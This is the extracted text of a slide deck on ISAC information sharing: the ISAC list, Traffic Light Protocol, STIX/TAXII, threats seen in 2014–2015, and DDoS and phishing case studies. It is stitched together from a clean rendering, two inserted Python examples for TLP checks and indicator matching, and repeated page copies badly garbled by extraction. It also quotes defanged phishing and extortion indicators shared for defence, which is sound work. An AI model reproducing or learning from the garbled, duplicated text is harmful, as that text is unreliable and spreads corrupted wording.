Case Studies in ISAC Information Sharing

Information Sharing

Denise Anderson, Executive Director
National Health Information Sharing & Analysis Center (NH-ISAC)
Chair, National Council of ISACs

Agenda

• What is an ISAC
• Overview of NCI
• Information Sharing – What and How
• Threats Seen
• Case Studies

What is an ISAC

Why ISACs

• Trusted entities established by CIKR owners and operators
• Comprehensive sector analysis, aggregation, anonymization
• Reach within their sectors, with other sectors, and with government to share critical information
• All-hazards approach
• Threat level determination for sector
• Operational: timely, accurate, actionable

ISACs

• Aviation ISAC
• Communications ISAC
• Defense Industrial Base ISAC
• Downstream Natural Gas ISAC
• Electricity ISAC
• Emergency Management & Response ISAC
• Financial Services ISAC
• Information Technology ISAC
• Maritime ISAC
• Multi-State ISAC
• National Health ISAC
• Oil and Natural Gas ISAC (ONG)
• Surface Transportation ISAC
• Water ISAC
• Over the Road & Motor Coach ISAC
• Public Transit ISAC
• Real Estate ISAC
• Research and Education ISAC
• Retail ISAC
• Supply Chain ISAC

Other Operational Entities and Upcoming ISACs

• Automotive
• Chemical
• Food & Ag
• Nuclear
• Critical Manufacturing

What is the National Council of ISACs

National Council of ISACs

Began meeting in 2003 to address common concerns and cross-sector interdependencies.

Volunteer group of ISACs who meet monthly to develop trusted working relationships among sectors on issues of common interest and work on initiatives of value to CIKR.

NCI Structure: National Council of ISACs – four designated operational representatives from each ISAC sit on the Council, plus all other entities/representatives, such as operations centers, who participate in information sharing.

Leadership: Chair Denise Anderson (FS-ISAC); Vice-Chair Scott Algeier (IT-ISAC); Secretary Josh Poster (ST-ISAC)

Information Sources and Communications

[Diagram: the National Council of ISACs at the centre, fed by information sources and producing communications]
Information sources: ISAC Ops Centers; ISACs & Other Sectors; DHS & Other Government Partners; Private Sector Liaison – NICC; PCIS; Other Sources (Hundreds)
Communications: Best Practice Sharing; Joint Statements; White Papers; Monthly Meetings; Daily & Weekly ISAC Calls; Briefings; ENS Calls and Crisis Calls; ListServ; Trusted Relationships

Examples of Activities

• Increase involvement of sectors without ISACs
• Daily, Weekly, Monthly and Crisis calls
• Cross Sector Information Sharing Portal
• Private Sector Liaison with the NICC
• Drills/Exercises such as NLEs, Cyber Storm
• OCF – Implement Real-Time Sector Threat Level Reporting Directorate

Points of Engagement

• National Infrastructure Coordinating Center (NICC)
• National Cybersecurity and Communications Integration Center (NCCIC)
  – DHS-led Unified Operations Watch & Warning Center
  – Operates 24 hours/day, 7 days/week, 365 days a year
• Unified Command Group – composed of private and public sector representatives
  – Meet monthly and during an incident as needed
  – Advise Assistant Secretary of CS&C on cybersecurity matters; provide subject matter expertise and response as necessary during an incident that requires national coordination

www.nationalcouncilofisacs.org
nationalcouncilofisacs@natlisacs.org

Information Sharing: Value, Structure, Trust

Information Sharing: Traffic Light Protocol

• TLP RED – Restricted to a defined group (e.g. only those present in a meeting). Information labeled RED should not be shared with anyone outside of the group.
• TLP AMBER – This information may be shared with FS-ISAC members.
• TLP GREEN – Information may be shared with FS-ISAC members and partners (e.g. vendors, MSSPs, customers). Information in this category is not to be shared in public forums.
• TLP WHITE – This information may be shared freely and is subject to standard copyright rules.
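The four rules above as an executable policy check, added here as an example and not taken from the presentation. It assumes the standard TLP colour order for the three bullets whose colour label was lost in extraction (AMBER, GREEN, WHITE) and the recipient classes the bullets name; the `reshare_marking` rule, that a recipient may tighten but never loosen a marking, is standard TLP practice rather than something stated on the slide.

```python
"""Apply the Traffic Light Protocol (TLP) sharing rules from the slide above.

Added example, not part of the original presentation. Colour names for the
three unlabelled bullets (AMBER, GREEN, WHITE) follow the standard TLP order;
the audiences each colour permits are taken from the slide's four rules.
"""
from enum import Enum


class TLP(Enum):
    RED = 0     # defined group only, e.g. those present in the meeting
    AMBER = 1   # FS-ISAC members
    GREEN = 2   # members and partners (vendors, MSSPs, customers); never public forums
    WHITE = 3   # may be shared freely, subject to standard copyright rules


class Audience(Enum):
    ORIGINATING_GROUP = "originating group"       # the defined group a RED item went to
    MEMBER = "FS-ISAC member"
    PARTNER = "partner (vendor / MSSP / customer)"
    PUBLIC = "public forum"


# Audiences each colour permits, one entry per bullet on the slide.
_ALLOWED = {
    TLP.RED: {Audience.ORIGINATING_GROUP},
    TLP.AMBER: {Audience.ORIGINATING_GROUP, Audience.MEMBER},
    TLP.GREEN: {Audience.ORIGINATING_GROUP, Audience.MEMBER, Audience.PARTNER},
    TLP.WHITE: set(Audience),
}


def parse_tlp_marking(text: str) -> TLP:
    """Pull the colour out of a marking line such as
    'TLP AMBER PROPRIETARY INFORMATION' or 'TLP:GREEN'."""
    tokens = text.upper().replace(":", " ").split()
    for i in range(len(tokens) - 1):
        if tokens[i] == "TLP" and tokens[i + 1] in TLP.__members__:
            return TLP[tokens[i + 1]]
    raise ValueError(f"no TLP marking in {text!r}")


def may_share(marking: TLP, audience: Audience) -> bool:
    """True when the slide's rule for `marking` permits `audience`."""
    return audience in _ALLOWED[marking]


def reshare_marking(original: TLP, requested: TLP) -> TLP:
    """Marking for a copy passed onward: a recipient may tighten a marking
    but never loosen it (standard TLP practice, assumed here); relabelling
    to a wider colour is the originator's decision, so it is refused."""
    if requested.value > original.value:
        raise PermissionError(
            f"cannot relabel TLP:{original.name} as TLP:{requested.name}; ask the originator")
    return requested


def route(marking_line: str, audiences) -> dict:
    """Per-audience share/withhold decision for a post carrying `marking_line`."""
    marking = parse_tlp_marking(marking_line)
    return {a: may_share(marking, a) for a in audiences}


if __name__ == "__main__":
    # The sharing thread later in this deck is marked 'TLP AMBER PROPRIETARY INFORMATION'.
    for audience, ok in route("TLP AMBER PROPRIETARY INFORMATION", list(Audience)).items():
        print(f"{audience.value:40s} {'share' if ok else 'withhold'}")
```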

  

     

  

Types of Information Shared: Cyber Threats, Vulnerabilities, Incidents

• Malicious Sites
• Threat Actors, Objectives
• Threat Indicators
• TTPs, Observables
• Courses of Action
• Exploit Targets
• Denial of Service Attacks
• Malicious Emails: Phishing, Spearphishing
• Software Vulnerabilities
• Malicious Software
• Analysis and risk mitigation
• Incident response

Primary Ways Information Is Shared

• Portal/Alerts
• Listservers
• Automation

Sample of Sharing Thread

"Received close to 500 so far and still coming in. 90 made it through to employees before being blocked by perimeter as spam."

Subject: Important message from BANK
Sender: youraccount@BANKmessage.com
URL: hxxp://www2.webmasterradio.fm/FanPage/Procss/Logon.html

"0 hits last 7 days."

"We've had about 50 hits so far; all are discarded."

"BANK: Submitted a takedown request for the phishing site."

TLP AMBER – PROPRIETARY INFORMATION

Sample of ISAC Sharing

• Indicators of Compromise: IP Address, Subject Line, MD5, TTP, Malware
• Ask a question: "Anyone else seeing...?" "What do you do in this situation?" "How do you handle...?"
• Share a Best Practice: "Here's how we..."
• Share a Mitigation Strategy: "Here's a script you can use..." "We did this..."

TLP AMBER – PROPRIETARY INFORMATION
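The workflow in the sharing thread above (one member posts subject, sender and defanged URL; others reply with how many hits they saw and whether the mail was blocked), written out as an added example that is not part of the presentation: it refangs the shared indicators using the hxxp and [AT] conventions seen on these slides, then counts matches in a 7-day window of mail-gateway logs and splits them into blocked and delivered. The report text, log format and log lines are constructed placeholders, not the indicators from the thread.

```python
"""Turn a shared phishing report into indicators and count hits in mail logs.

Added example, not part of the original presentation. The report, the log
format and the log lines below are constructed for illustration; the workflow
mirrors the thread above, where members reply with '0 hits last 7 days' or
'50 hits so far, all discarded'.
"""
import re
from collections import Counter
from datetime import datetime, timedelta

# Defanging conventions used in shared threads and on these slides: hxxp, [.], [AT].
_REFANG = [
    (re.compile(r"^hxxps?://", re.I), lambda m: m.group(0).lower().replace("hxxp", "http")),
    (re.compile(r"\[\.\]|\(\.\)|\{\.\}"), "."),
    (re.compile(r"\[at\]|\(at\)", re.I), "@"),
]


def refang(value: str) -> str:
    """Restore a defanged indicator to a matchable, lower-cased form.
    (Lower-casing the URL path is lossy in general; fine for log matching.)"""
    out = value.strip()
    for pattern, repl in _REFANG:
        out = pattern.sub(repl, out)
    return out.lower()


def parse_report(text: str) -> dict:
    """Extract 'Subject:', 'Sender:' and 'URL:' lines from a shared report."""
    iocs = {}
    for line in text.splitlines():
        m = re.match(r"\s*(subject|sender|url)\s*:\s*(.+)", line, re.I)
        if m:
            iocs[m.group(1).lower()] = refang(m.group(2))
    return iocs


# Constructed gateway log line shape:
#   <ISO timestamp> from=<addr> to=<addr> subject="..." [url=<url>] action=<verdict>
_LOG_RE = re.compile(
    r'^(?P<ts>\S+) from=<(?P<from>[^>]*)> to=<(?P<to>[^>]*)> '
    r'subject="(?P<subject>[^"]*)"(?: url=(?P<url>\S+))? action=(?P<action>\w+)$'
)


def match_logs(iocs: dict, log_lines, now: datetime, days: int = 7) -> dict:
    """Count log entries in the last `days` that match any shared indicator,
    broken down by which field matched and by delivered vs. blocked."""
    window_start = now - timedelta(days=days)
    by_field, outcome = Counter(), Counter()
    for line in log_lines:
        m = _LOG_RE.match(line)
        if not m:
            continue  # not a gateway line; ignore rather than fail the whole run
        if datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ") < window_start:
            continue  # outside the reporting window
        fields = {
            "sender": m["from"].lower(),
            "subject": m["subject"].lower(),
            "url": (m["url"] or "").lower(),
        }
        matched = [k for k, v in iocs.items() if k in fields and fields[k] == v]
        if not matched:
            continue
        for k in matched:
            by_field[k] += 1
        outcome["delivered" if m["action"] == "delivered" else "blocked"] += 1
    return {"by_field": dict(by_field), "outcome": dict(outcome), "total": sum(outcome.values())}


# Constructed report in the shape of the thread above (placeholder domains).
SHARED_REPORT = """\
Subject: Important message from BANK
Sender: youraccount[AT]bank-message[.]example
URL: hxxp://www2.phish[.]example/FanPage/Logon.html
"""

NOW = datetime(2015, 8, 11, 12, 0, 0)

# Constructed log lines: two blocked, one delivered (subject-only match), one too old, one unrelated.
LOG_LINES = [
    '2015-08-10T09:12:44Z from=<youraccount@bank-message.example> to=<alice@corp.example> subject="Important message from BANK" url=http://www2.phish.example/FanPage/Logon.html action=quarantine',
    '2015-08-10T09:13:02Z from=<youraccount@bank-message.example> to=<bob@corp.example> subject="Important message from BANK" url=http://www2.phish.example/FanPage/Logon.html action=dropped',
    '2015-08-11T08:01:10Z from=<alerts@other.example> to=<carol@corp.example> subject="Important message from BANK" action=delivered',
    '2015-07-20T10:00:00Z from=<youraccount@bank-message.example> to=<dave@corp.example> subject="Important message from BANK" action=delivered',
    '2015-08-11T09:30:00Z from=<hr@corp.example> to=<erin@corp.example> subject="Payroll reminder" action=delivered',
]


def summarize(report: str = SHARED_REPORT, log_lines=LOG_LINES, now: datetime = NOW) -> dict:
    """The reply a member would post back to the thread, as data."""
    return match_logs(parse_report(report), log_lines, now)


if __name__ == "__main__":
    s = summarize()
    print(f"{s['total']} hits last 7 days: {s['outcome']} (by field: {s['by_field']})")
```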

A Common Language

• Structured Threat Information Expression (STIX) is a common language: a way for all to speak the same.

Trusted Automated eXchange of Indicator Information (TAXII)

• The goal of TAXII is to facilitate the exchange of structured cyber threat information
• Designed to support existing sharing paradigms in a more automated manner
• TAXII is a set of specifications defining the network-level activity of the exchange
• Defines services and messages to exchange data
• Does NOT dictate HOW data is handled in the back-end, WHAT data is shared, or WHO it is shared with
• TAXII is NOT a sharing program
• TAXII is a protocol over which STIX can be transported

What is Cyber Threat Intelligence? 8 Constructs of STIX

[Diagram: levels of threat intelligence (Atomic, Tactical, Operational, Strategic) and the questions the STIX constructs answer]
• What threat activity are we seeing?
• What threats should I look for on my networks and systems, and why?
• Where has this threat been seen?
• What weaknesses does it exploit?
• What can I do about it?
• Who is responsible for this threat?
• Why do they do this?
• What do they do?

Threats Seen

        

Cyber Threat Environment

• Actors
  – Nation States
  – Terrorists
  – Criminals
  – Insiders
  – Activists/Hacktivists
  – Media
  – Vendors

Seen Last Week...
• Nuclear Exploit Kit
• OpenVAS Scanning
• Angler/Neutrino
• PlugX
• DDoS
• Dridex
• Upatre/Dyre

Malware – Exploit Kits: Top Exploit Kits Seen

• Blackhole EK – Paunch, 10/13
• Infinity EK – Flash player exploit
• Neutrino EK – Mixes legitimate and non-legitimate requests to obfuscate the code
• Magnitude EK – Ransomware
• Sweet Orange EK – Website
• Fiesta EK – Silverlight
• Angler EK – hides behind legitimate web code
• Crimeboss EK – Java exploits

Ransomware

• CryptoLocker
• CryptoWall
• CryptoDefense
• TorrentLocker
• Darkleech

Top infections: US, AU, Canada, UK, India. Also saw Singapore trend.

Delivery Mechanisms: Phishing/Spearphishing

• Court Notice
• Invoice/Statement
• Shipping themes: DHL, FedEx, UPS
• EZ Pass
• Bank phish – Swift transfer
• Dhgate invoice
• eFax
• Salesforce
• Reward themes
• Airline – Delta
• WhatsApp – "You've got a voicemail"

Malware – Banking Trojans: Top Trojans Seen

• Citadel
• Kronos
• Kuluoz – Asprox
• Carberp
• Zeus
• Zberp – hybrid
• Gameover Zeus (GOZ) – P2P (arj), 9/14
• Cridex – Bugat, Feodo, Dridex
• Dyre
• Shylock – July 2014 takedown

Dyre Spreads Like A Global Virus...

• June 2014: UK, US
• September 2014: Salesforce.com attacked
• October 2014: Romania, Germany and Switzerland
• November 2014: Over 100 firms targeted
• December 2014: Australia and China

Delivery Mechanisms: Drive-by Downloads and Watering Holes

Forbes.com, Energystar.com, AusPost-tracking.com, VA.gov, NBC.com – Citadel, 2013

Vulnerability Scanning

• Port Scans – Open ports
• Vulnerability Scans – WordPress, Joomla, Java, Flash, OpenSSL
• Infrastructure

Vulnerabilities

• OpenSSL/Heartbleed
  – Old vulnerability
  – Allows more data than allowed to be read
  – Website vulnerability
  – Banks took rap unfairly
• GNU Bash/Shellshock
  – Old vulnerability (1994)
  – Unix based: Linux, Apple Mac OS X
  – Went public Wednesday 9/24
  – Exploits and scanning seen almost immediately

Breaches

Malware: ChewBacca, Dexter, BlackPOS, Backoff

• Target – 70 million – 2013
• OPM – 21.5 million
• Premera BCBS – 11.2 million
• Community Health Systems – 4.5 million
• Anthem BCBS – 80 million
• Sony, Hacking Team

2015 Breaches Identified by the ITRC as of 8/11/2015
• Total Breaches: 5,500 approx.
• Total Records Exposed: 818,004,561
• Identity Theft Resource Center

DDoS

• Sony PlayStation – Lizard Squad
• Operation Ababil
• Las Vegas – Gaming Industry
• Israel
• DD4BC
• World Cup

Q1 2015 Compared to Q4 2014 (Akamai)
• 15% decrease in average attack time
• 35% increase in total DDoS attacks
• 42% increase in SSDP DDoS attacks (routers)
• 22% increase in application layer DDoS attacks
• 7% decrease in average attack bandwidth (170 Gbps)
• 37% increase in infrastructure layer DDoS attacks

Wiper Malware

• Shamoon – 2012
  – Attack on 30,000 Saudi Aramco workstations
  – Corrupts files and wipes devices
• South Korean Attacks – 2013
  – 2 banks, media company and insurance company
  – Patch systems targeted and used to infect
  – Wiped Windows, Linux and UNIX OS
• Las Vegas Casino – 2014
  – Wiped and destroyed files with VB bomb
• Sony – 2014
  – SMB Worm Tool: listening implant, backdoor, proxy tool, destructive hard drive tool, destructive targeted cleaning tool, network propagation wiper
  – Financial data destroyed; financial system still inoperable – asks for delay in filing

The Media and Vendors

• Malvertising
• Watering Holes
• Syrian Electronic Army

Media/Vendor Spin Incidents
• HeartBleed – OpenSSL
• Hedge Fund Attack – BAE
• Russians Attack Financial System
• Russians Hack 1.4 Billion Passwords – Hold Security

Other Threats

• Call Center – Phishing
• Mobile
• Social Media – Sony Executive on American Airlines
• Industrial Control Systems – Havex
• Espionage – VirusTotal testing for malware

Case Studies

   

DDoS – DD4BC

Since April 2015:
• From: "DD4BC Team" <d4bct[AT]gmail[.]com>
• Subject: DDOS ATTACK
• Size: 500 Mbps to 50 Gbps
• Duration: Up to 1 hour
• Ransom Demand: 25-40 BTC

United/NYSE

• NYSE, July 8, 2015: 11:32am; 11:45am chatter; Noon definitive word
• UNITED: 8:26 am, Reservation System

United Parcel Service

• USSS, NCCIC, FS-ISAC – Collaborate to release malware analysis and risk mitigation recommendations
• Shared with Retailers Association
• UPS detected and used to mitigate malware

Questions?

Page 2: Case Studies in ISAC Information Sharing...ISACs • Oil and Natural Gas ISAC (ONG) • Surface TransportaMon • Water ISAC • Over the Road & Motor Coach ISAC • Public Transit

     

Agenda

bull What13 is an ISAC

bull Overview of NCI13 bull InformaMon Sharing -shy‐ What13 and How

bull Threats Seen

bull Case Studies

What is an ISAC

Why ISACs

Why ISACs

v Trusted enMMes established by CIKR13 owners and operators

v Comprehensive sector analysis aggregaMon anonymizaMon

v Reach-shy‐within their sectors with other sectors and with government13 to share criMcal informaMon

v All-shy‐hazards approach

v Threat13 level determinaMon for sector

vOperaMonal-shy‐Mmely accurate acMonable

           

ISACs bull AviaMon ISAC

bull CommunicaMons ISAC

bull Defense Industrial Base ISAC

bull Downstream Natural Gas ISAC

bull Electricity ISAC

bull Emergency Management13 amp Response ISAC

bull Financial Services ISAC

bull InformaMon Technology

bull MariMme ISAC

bull MulM-shy‐State ISAC

bull NaMonal Health ISAC

ISAC

         

ISACs bull Oil and Natural Gas ISAC (ONG)

bull Surface TransportaMon

bull Water ISAC

bull Over the Road ampMotor Coach ISAC

bull Public Transit13 ISAC

bull Real Estate ISAC

bull Research and EducaMon ISAC

bull Retail ISAC

bull Supply Chain ISAC

ISAC

     

Other13 OperaKonal EnKKes13 and Upcoming ISACs

bull AutomoKve

bull Chemical bull Food amp Ag

bull Nuclear bull CriMcal Manufacturing

What is the National Council of ISACs

NaKonal Council of ISACs

Began meeMng in 2003 to address common concerns and cross-shy‐sector interdependencies

Volunteer group of ISACs who meet13 monthly todevelop trusted working relaMonships among sectors on issues of common interest13 and work oniniMaMves of value to CIKR13

NCI13 Structure NaMonal Council of ISACs four designated operaMonalrepresentaMves from each ISAC sit13 on the Council

ISAC Plus all other enMMesrepresentaMves such asoperaMons centers who parMcipate in informaMon sharing

Leadership Chair Denise Anderson-shy‐FS-shy‐ISAC Vice-shy‐Chair ScoO Algeier-shy‐IT-shy‐ISAC Secretary Josh Poster-shy‐ST-shy‐ISAC

Information Sources Communications

Best Practice Sharing -

Joint Statements -White Papers

Monthly Meetings

Daily amp Weekly ISAC

Calls

Briefings ENS Calls And Crisis

Calls

ListServ Trusted

Relationships ISAC Ops Centers

ISACs amp Other

Sectors

DHS amp Other Government Partners

Private Sector Liaison -NICC

Other Sources

(Hundreds)

PCIS

National Council of

ISACs

      

Examples of AcKviKes

ndash Increase involvement13 of sectors without13 ISACs ndash Daily Weekly Monthly and Crisis calls ndash Cross13 Sector13 InformaKon Sharing13 Portal ndash Private13 Sector13 Liaison with the13 NICC13 ndash DrillsExercises Such as NLEs Cyber Storm

bull OCFndash Implement13 Real-shy‐Time sector Threat13 Level

ReporMng Directorate

  

  

  

Points13 of13 Engagementbull NaMonal Infrastructure CoordinaMng Center (NICC) bull NaMonal Cybersecurity and CommunicaMons IntegraMon

Center (NCCIC) ndash DHS-shy‐led Unified OperaMons Watch ampWarning Center ndash Operates 24 hoursday 7 daysweek 365 days a year

bull Unified Command Group-shy‐composed of private and public sector representaMves ndash Meet13 monthly and during an incident13 as needed ndash Advise Assistant13 Secretary of CSampC on cybersecurity maOers provide subject13 maOer experMse and response as necessary during an incident13 that13 requires naMonal coordinaMon

wwwnationalcouncilofisacsorg nationalcouncilofisacsnatlisacsorg

InformaKon13 Sharing Valu e

Structur e

Trust

Information Sharing Traffic Light Protocol

curren Restricted to a defined group (eg only those present in ameeting) Information labeled RED should not be shared withanyone outside of the group

curren This information may be shared with FS-ISAC members

curren Information may be shared with FS-ISAC members andpartners (eg vendors MSSPs customers) Information in this category is not to be shared in public forums

curren This information may be shared freely and is subject to standard copyright rules

  

     

  

Types13 of13 InformaKon SharedCyber13 Threats VulnerabiliKes Incidents

uumlMalicious Sites uumlThreat13 Actors ObjecMves13

uumlThreat13 Indicators uumlTTPs Observables uumlCourses13 of AcMon13 uumlExploit13 Targets uumlDenial of Service AOacks

uumlMalicious Emails Phishing Spearphishing

uumlSogtwareVulnerabiliMes

uumlMalicious Sogtware uumlAnalysis and risk miMgaMon

uumlIncident13 response

   

Primary Ways13 InformaKon Is13 Shared

uumlPortalAlerts uumlListservers uumlAutomaMon

Sample of Sharing Thread

Received close to 500 so far and sMll coming in 90 made it13 through to employees before being blocked by perimeter asspam

SubjectImportant13 message from BANK Sender youraccountBANKmessagecom URL hxxpwww2webmasterradiofm FanPageProcssLogonhtml

0 hits last13 7days

Wersquove had about13 50 hits so far all arediscarded

TLP AMBER13 PROPRIETARY INFORMATION

BANK SubmiOed atakedown request13 for the phishing site

Sample of ISAC Sharing

Indicators of Compromise IP Address Subject Line MD5 TTP Malware

Ask a question Anyone else seeing What do you do in this situation How do you handlehelliphelliphelliphellip

Share a Best Practice Herersquos how wehelliphellip

Share a Mitigation Strategy Herersquos a script you can usehelliphellip We did thishelliphellip

TLP AMBER13 PROPRIETARY INFORMATION

A Common Language

sect Structured Threat Information Expression is a common language a way for all to speak the same

   

   

Trusted Automated eXchange of Indicator Information (TAXII)

sect The goal of TAXII is to facilitate the exchange of structured cyber threat information sect Designed to support existing sharing paradigms in a

more automated manner

sect TAXII is a set of specifications defining the network-level activity of the exchange sect Defines services and messages to exchange data sect Does NOT dictate HOW data is handled in the

back-end WHAT data is shared or WHO it is shared with

sect TAXII is NOT a sharing program sect TAXII is a protocol over which STIX can be

transported

What is13 Cyber13 Threat Intelligence8 Constructs13 of STIX

Atomic

Tactical

Operational

What threat activity are we seeing

What threats should I look for on my networks and systems and why

Where has this What weaknesses What can I threat been seen does it exploit do about it

Strategic

Who is responsible for this threat

Why do they do this

What do they do

Threats Seen

        

Cyber13 Threat Environment

bull Actors ndash NaMon States ndash Terrorists ndash Criminals ndash Insiders ndash AcMvistsHackMvists ndash Media13 ndash Vendors13

Seen Last Weekhellip Nuclear Exploit13 Kit13

Open VAS Scanning

AnglerNeutrino

PlugX

DDoS

Dridex13

UpatreDyre

13

xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxx

Malware-shy‐Exploit Kits Top Exploit13 Kits Seen

Blackhole EK ndash Paunch 1013 Infinity EK Flash player exploit13 Neutrino13 EK Mixes legiMmate non-shy‐legiMmate requests toobsfuscate the code Magnitude EK -shy‐ Ransomware Sweet Orange13 EK -shy‐ Website Fiesta EK -shy‐ Silverlight13 Angler EK hides behind legiMmate web code Crimeboss13 EK Java exploits

Ransomware

-shy‐Crytolocker-shy‐CryptoWall -shy‐CryptoDefense-shy‐Torrent13 Locker -shy‐Darkleach

Top infecMons USAUCanadaUKIndia Also saw Singapore trend

Delivery Mechanisms PhishingSpearphishing

Court13 NoMce InvoiceStatament13 Shipping Themes DHL Fedex UPS EZ Pass Bank Phish ndash Swigt Transfer Dhgate invoice eFax Salesforce Reward themes Airline ndash Delta13 WhatsApp ndash Yoursquove got13 a voicemail

Malware Banking Trojans Top Trojans13 Seen13

Citadel Kronos Kulouz13 ndash Asprox Carperb13 Zeus13 Zberp13 -shy‐ hybrid13 Game-shy‐over Zeus (GOZ) -shy‐ P2P (arj) 914 Cridex ndash Bugat Feodo Dridex13 DyreShylock ndash July 2014 Takedown

Dyre Spreads Like A Global Virushellip

June 2014 UK US

September 2014 Salesforcecom

Attacked

October 2014 Romania Germany

and Switzerland

November 2014 Over 100 firms

targeted

December 2014 Australia and

China

Delivery Mechanisms

Drive-shy‐by Downloads and Watering13 Holes

Forbescom13 Energystarcom13 AusPost-shy‐trackingcom13 VAgov NBCcom13 ndash Citadel 2013

  

Vulnerability Scanning

bull Port13 Scans ndash Open ports bull Vulnerability Scans -shy‐ Wordpress Joomla Java

Flash Open13 SSLbull Infrastructure

     

     

VulnerabiliKes

bull OpenSSLHeartbleed ndash Old vulnerability ndash Allows more data than allowed tondash Website vulnerability ndash Banks took rap unfairly

bull GNU BashShellshock ndash Old vulnerability 1994 ndash Unix based Linux Apple Mac13 OX13 ndash Went13 public13 Wednesday 924 ndash Exploits and scanning seen almost13 immediately

be read

      

   

Breaches Malware ChewBacca Dexter Black POS

Oslash Target 70 million -shy‐ 2013 Oslash OPM 215 million Oslash Primera BCBS 112 million Oslash Community Health Systems 45 million Oslash Anthem13 BCBS 80 million Oslash SonyHacking Team13

2015 Breaches IdenKfied by the ITRC as of13 8112015

bullTotal Breaches13 5500 approx

bullTotal Records Exposed 818004561 bullIdenAty The4 Resource Center

Backoff

      

DDoS Oslash Sony PlayStaMon ndash Lizard Squad Oslash OperaMon13 Ababil13 Oslash Las Vegas ndash Gaming Industry Oslash Israel Oslash DD4BCOslash World Cup

Q1 2015 Compared to Q4 2014

15 decrease in avg aOack Mme35 increase in total DDoS aOacks 42 increase in SSDP DDoS aOacks (routers) 22 increase in aplicaMon layer DDoS aOacks 7 decrease in average aOack bandwidth (170 Gbps) 37 increase in infrastructure layer DDoS aOacks Akamai

  

    

  

  

Wiper Malware Oslash Shamoon ndash 2012

Oslash ANack on 30000 Saudi Aramco WorkstaMons Oslash Corrupts files and wipes devices

Oslash South Korean ANacksndash13 2013 Oslash 2 banks media company and insurance company Oslash Patch systems targeted and used to infect13 Oslash Wiped windows Linux and UNIX13 OS

Oslash Las Vegas13 Casinondash 2014 Oslash Wiped and destroyed files with VB bomb

Oslash Sony ndash 2014 Oslash SMB Worm13 Tool listening implant backdoor proxy

tool destrucMve hard drive tool destrucMve targeted cleaning tool network propogaMon wiper

Oslash Financial data destroyed financial system13 sMll inoperable ndash asks for delay in filing

    

The Media and Vendors MalverMsing Watering Holes

Syrian Electronic13 Army

Media Vendor Spin Incidents

bull HeartBleed13 Open SSL bull Hedge Fund ANack -shy‐ BAEbull Russians ANack Financial System13 bull Russians Hack 14 Billion Passwords -shy‐ Hold Security

     

Other13 Threats

bull Call Center ndash Phishing bull Mobile bull Social Media ndash Sony ExecuMve on American Airlines bull Industrial Control Systems -shy‐ Havex bull Espionage ndash VirusTotal tesMng for malware

Case Studies

   

DDoS ndash DD4BC

Since April 2015 bullSubject Line bullFrom From DD4BC Team ltd4bct[AT]gmail[]comgt bullSubject DDOS ATTACK

Size 500 Mbps to 50 Gbps Duration Up to 1 hour Ransom Demand 25-40 BTC

UnitedNYSE

NYSE July 8 2015 1132am 1145am chatter Noon definitive word

UNITED 826 am Reservation System

United13 Parcel13 Service

bull USSS NCCIC FS-shy‐ISAC ndashCollaborate to releasemalware analysis and risk miMgaMon recommendaMons

bull Shared with Retailers AssociaKon

bull UPS Detected13 and used13 to miKgate Malware

QuesKons

Page 3: Case Studies in ISAC Information Sharing...ISACs • Oil and Natural Gas ISAC (ONG) • Surface TransportaMon • Water ISAC • Over the Road & Motor Coach ISAC • Public Transit

What is an ISAC

Why ISACs

Why ISACs

v Trusted enMMes established by CIKR13 owners and operators

v Comprehensive sector analysis aggregaMon anonymizaMon

v Reach-shy‐within their sectors with other sectors and with government13 to share criMcal informaMon

v All-shy‐hazards approach

v Threat13 level determinaMon for sector

vOperaMonal-shy‐Mmely accurate acMonable

           

ISACs bull AviaMon ISAC

bull CommunicaMons ISAC

bull Defense Industrial Base ISAC

bull Downstream Natural Gas ISAC

bull Electricity ISAC

bull Emergency Management13 amp Response ISAC

bull Financial Services ISAC

bull InformaMon Technology

bull MariMme ISAC

bull MulM-shy‐State ISAC

bull NaMonal Health ISAC

ISAC

         

ISACs bull Oil and Natural Gas ISAC (ONG)

bull Surface TransportaMon

bull Water ISAC

bull Over the Road ampMotor Coach ISAC

bull Public Transit13 ISAC

bull Real Estate ISAC

bull Research and EducaMon ISAC

bull Retail ISAC

bull Supply Chain ISAC

ISAC

     

Other13 OperaKonal EnKKes13 and Upcoming ISACs

bull AutomoKve

bull Chemical bull Food amp Ag

bull Nuclear bull CriMcal Manufacturing

What is the National Council of ISACs

NaKonal Council of ISACs

Began meeMng in 2003 to address common concerns and cross-shy‐sector interdependencies

Volunteer group of ISACs who meet13 monthly todevelop trusted working relaMonships among sectors on issues of common interest13 and work oniniMaMves of value to CIKR13

NCI13 Structure NaMonal Council of ISACs four designated operaMonalrepresentaMves from each ISAC sit13 on the Council

ISAC Plus all other enMMesrepresentaMves such asoperaMons centers who parMcipate in informaMon sharing

Leadership Chair Denise Anderson-shy‐FS-shy‐ISAC Vice-shy‐Chair ScoO Algeier-shy‐IT-shy‐ISAC Secretary Josh Poster-shy‐ST-shy‐ISAC

Information Sources Communications

Best Practice Sharing -

Joint Statements -White Papers

Monthly Meetings

Daily amp Weekly ISAC

Calls

Briefings ENS Calls And Crisis

Calls

ListServ Trusted

Relationships ISAC Ops Centers

ISACs amp Other

Sectors

DHS amp Other Government Partners

Private Sector Liaison -NICC

Other Sources

(Hundreds)

PCIS

National Council of

ISACs

      

Examples of AcKviKes

ndash Increase involvement13 of sectors without13 ISACs ndash Daily Weekly Monthly and Crisis calls ndash Cross13 Sector13 InformaKon Sharing13 Portal ndash Private13 Sector13 Liaison with the13 NICC13 ndash DrillsExercises Such as NLEs Cyber Storm

bull OCFndash Implement13 Real-shy‐Time sector Threat13 Level

ReporMng Directorate

  

  

  

Points13 of13 Engagementbull NaMonal Infrastructure CoordinaMng Center (NICC) bull NaMonal Cybersecurity and CommunicaMons IntegraMon

Center (NCCIC) ndash DHS-shy‐led Unified OperaMons Watch ampWarning Center ndash Operates 24 hoursday 7 daysweek 365 days a year

bull Unified Command Group-shy‐composed of private and public sector representaMves ndash Meet13 monthly and during an incident13 as needed ndash Advise Assistant13 Secretary of CSampC on cybersecurity maOers provide subject13 maOer experMse and response as necessary during an incident13 that13 requires naMonal coordinaMon

wwwnationalcouncilofisacsorg nationalcouncilofisacsnatlisacsorg

